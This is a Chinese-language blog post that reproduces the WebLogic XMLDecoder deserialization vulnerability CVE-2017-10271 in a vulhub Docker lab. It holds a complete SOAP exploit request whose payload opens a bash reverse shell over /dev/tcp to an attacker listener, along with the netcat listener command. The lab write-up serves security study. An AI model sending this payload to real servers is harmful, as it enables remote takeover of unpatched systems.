(CVE-2017-10271)weblogic XMLDecoder反序列化漏洞复现过程

最新推荐文章于 2024-08-01 08:04:57 发布
最新推荐文章于 2024-08-01 08:04:57 发布
阅读量603 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41607190/article/details/108240589
版权

搭建环境
ubuntu 16.04 weblogic所在的环境
kali2020 攻击机

前言

https://www.anquanke.com/post/id/92003 漏洞原理(代码分析)

首先ubuntu中要有docker,用docker部署环境会省很多时间

apt-get install docker*
service start docker

安装git

apt-get install git

docker -v可以看docker有没有安装成功
创建或者修改/etc/docker/daemon.json文件

{
“registry-mirrors”: [“https://cr.console.aliyun.com”]
}

下载vulhub靶场,这里面包含很多cve漏洞,对一些研究漏洞小伙伴来说算是福音了
放在方便找到的文件夹下,否则就是在当前的目录下下载

wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master

在这里插入图片描述在weblogic目录下,cve-2017-10271
在这里插入图片描述
在这里插入图片描述
可以用cat README.md查看复现过程
在这里插入图片描述docker常用命令

docker ps 查看运行中的容器
在这里插入图片描述

docker start 容器名字 启动容器
docker stop 容器名字 暂停容器
docker exec -it 容器ID /bin/bash 进入容器内部

docker compose up -d搭建环境
访问ubuntu的ip地址+7001端口,有下面这个页面说明搭建成功
在这里插入图片描述

复现过程

访问http://10.92.1.126:7001/wls-wsat/CoordinatorPortType11,如下图说明存在漏洞
在这里插入图片描述在kali上开启端口监听

nc -l -p 21

构造发送的post数据包,注意payload部分需要html编码,README.md文件中也有提到

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/接收shell的ip/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述
发送成功后就反弹到shell了
在这里插入图片描述

如果还有不懂的地方可以关注我的公众号“沉淀Hack”,发消息向我留言,每天会更新大量干货教程,快扫下面的二维码吧
在这里插入图片描述

InventorMAO
关注
专栏目录
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271复现)
薛定谔嘚喵博客
05-07 741
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。漏洞触发url漏洞本质:主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
weixin_45694388的博客
07-09 5258
漏洞产生原因: CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 涉及版本: 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建: vulhub 工具利用: 检测: 工具:weblogicScanner
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271)漏洞分析
weixin_34138255的博客
11-09 263
12月22号,绿盟科技博客发布一篇文章,里面有提及到weblogic由于存在0day漏洞,导致被植入恶意软件用来挖掘比特币。后来经过确认,这次攻击者所用的漏洞CVE编号为CVE-2017-10271,那么这个漏洞究竟是怎样造成的? 0. 分析环境 IDE:Intellij IDEA 中间件版本: weblogic 10.3.6【未进行任何补丁修复...
WebLogic:CVE-2017-10271[XML反序列化]
最新发布
h1008685的博客
08-01 727
WebLogic:CVE-2017-10271[XML反序列化],漏洞成因,环境部署,漏洞利用:1.漏洞发生页 2.配置poc请求包,3.kali监听端口,4.bp发送poc请求包,5.连接建立成功
Weblogic(CVE-2017-10271)的漏洞复现
陈瘦瘦的迪迦的博客
08-05 1226
Weblogic(CVE-2017-10271)漏洞复现 漏洞形成原因 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 漏洞如何利用 利用服务器的XMLDecoder可以解析XML数据这一特性,可以构造XML语句,上传一句话木马,getshell。 漏洞复现过程 Kali docker 容器中启动此漏洞环境 浏览器访问 Kali 的 ip 地址并接上
漏洞复现WebLogic XMLDecoder反序列化(CVE-2017-10271
m0_69043895的博客
04-25 741
前往Oracle官网下载10月份所提供的安全补丁:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html升级过程可参考:http://blog.csdn.net/qqlifu/article/details/49423839。漏洞不仅仅存在与 /wls-wsat/CoordinatorPortType,只要是wls-wsat包中的Url皆收到影响,可以查看web.xml得知所受到影响的URl。
Weblogic CVE-2017-10271漏洞复现
君莫hacker的博客
09-09 1504
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
2017年,WebLogic服务器被发现存在一个名为CVE-2017-10271的安全漏洞,这是一个高危级别的反序列化漏洞。这个漏洞允许攻击者通过构造恶意的Java对象序列化数据,远程执行任意代码,从而控制受影响的系统。 **CVE-...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271
lc0813的博客
04-13 207
漏洞概述: Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 环境搭建: 下载地址:https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 漏洞检测: 漏洞利用: 使用kal...
CVE-2017-10271(JAVA XMLDecoder反序列化专用工具).zip
06-22
测试专用
Weblogic漏洞CVE -2017-10271解决方案-附件资源
03-05
Weblogic漏洞CVE -2017-10271解决方案-附件资源
CVE-2017-10271:CVE-2017-10271 WEBLOGIC RCE(已测试)
04-27
CVE-2017-10271 用法:CVE-2017-12149.py targetip WEBLOGIC RCE仅适用于Windows,您可以为Linux编辑一点代码。
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
江小白
07-20 635
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限。。 受影响WebLogic版本:10.3.6.0.0,12.1...
XML Decoder反序列化漏洞CVE-2017-10271
热门推荐
yumengzth的博客
07-27 1万+
0x00 漏洞产生的原因 CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 反序列化漏洞的原理与动态调试推荐链接 WebLogic XMLDeco...
Weblogic(CVE-2017-10271)漏洞复现
01-05 2070
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2....
渗透测试干货必看,手把手教你复现 | weblogic系列之CVE-2017-10271漏洞复现
Hexuefu_Bayonet的博客
06-06 744
#渗透测试 | CVE-2017-10271漏洞复现 1.下载vulhub-master压缩包到kali中,解压缩 2.进入到 /vulhub-master/weblogic/CVE-2017-10271目录下 3.开启docker容器 service docker start 或 systemctl start docker 4.接着启动docker编译 5.查看容器状态 6.查看漏洞靶场的ip地址 7.查看下端口是否映射成功,出现下面的页面说明搭建成功 8.访问该路径下的/wls-ws
WebLogic-XMLDecoder(CVE-2017-10271)反序列化漏洞分析及复现
人若无名,便可专心练剑
04-13 1661
下面的内容主要是给师傅们介绍和讲解下weblogic XMLDecoder漏洞,这个漏洞有很多个版本,有多个cve漏洞,这里我主要从基于IDEA和vulhun环境搭建来给师傅们复现下这个weblogic XMLDecoder漏洞复现完成的师傅们,要是基础还可以,学过Java代码的可以尝试掌握下这个漏洞的POC构造,这个是底层代码原理,比较难,小白的话把漏洞原理以及漏洞复现完成即可!!!
CVE-2020-14644:WebLogic IIOP反序列化漏洞深度解析
"CVE-2020-14644是一个针对Oracle WebLogic Server的IIOP(Internet Inter-ORB Protocol)反序列化漏洞,主要影响12.2.1.3.0, 12.2.1.4.0, 和14.1.1.0.0这几个版本。该漏洞允许攻击者通过精心构造的恶意输入来触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值